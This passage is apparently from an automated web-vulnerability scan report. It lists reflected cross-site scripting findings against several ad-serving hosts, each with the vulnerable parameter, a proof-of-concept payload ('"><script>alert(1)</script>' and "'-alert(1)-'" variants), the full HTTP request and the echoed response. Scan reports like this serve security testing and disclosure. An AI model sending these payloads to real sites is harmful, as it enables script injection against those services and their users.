Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613d6cd7'-alert(1)-'948355e44c0&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D429613d6cd7%27-alert%281%29-%27948355e44c0%26_salt%3D975924496%26B%3D10%26u%3Dhttp%253A%
...[SNIP]...

4.27. http://ad.harrenmedianetwork.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&inv_code=429613&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&s=429613&t=2" target="parent">
...[SNIP]...

4.28. http://ad.harrenmedianetwork.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x6008e920'-alert(1)-'fcb38195981&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x6008e920%27-alert%281%29-%27fcb38195981%26section%3D429613">
...[SNIP]...

4.29. http://ad.harrenmedianetwork.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f47e8'-alert(1)-'64ed47f711b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x600%26section%3D429613f47e8%27-alert%281%29-%2764ed47f711b">
...[SNIP]...

4.30. http://ad.harrenmedianetwork.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f92b8"><script>alert(1)</script>05d28b2545d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613f92b8"><script>alert(1)</script>05d28b2545d&t=2" target="parent">
...[SNIP]...

4.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.reduxmedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

4.32. http://ad.scanmedios.com/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 402
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250b9973'-alert(1)-'b683290dc0&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250b9973%27-alert%281%29-%27b683290dc0%26s%3D601669%26_salt%3D1358407199%26B%3D10%
...[SNIP]...

4.33. http://ad.scanmedios.com/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 404
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669abe80'-alert(1)-'f0f512ee374&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D601669abe80%27-alert%281%29-%27f0f512ee374%26_salt%3D1358407199%26B%3D10%26u%3Dhttp%253A
...[SNIP]...

4.34. http://ad.scanmedios.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250a927c"><script>alert(1)</script>8783e6815d8&inv_code=601669&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250a927c"><script>alert(1)</script>8783e6815d8&s=601669&t=2" target="parent">
...[SNIP]...

4.35. http://ad.scanmedios.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250dce2d'-alert(1)-'7ba8e3efc79&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250dce2d%27-alert%281%29-%277ba8e3efc79%26section%3D601669">
...[SNIP]...

4.36. http://ad.scanmedios.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669f734e'-alert(1)-'2b959f792a9&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D601669f734e%27-alert%281%29-%272b959f792a9">
...[SNIP]...

4.37. http://ad.scanmedios.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669a9583"><script>alert(1)</script>2bc6827f86d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669a9583"><script>alert(1)</script>2bc6827f86d&t=2" target="parent">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

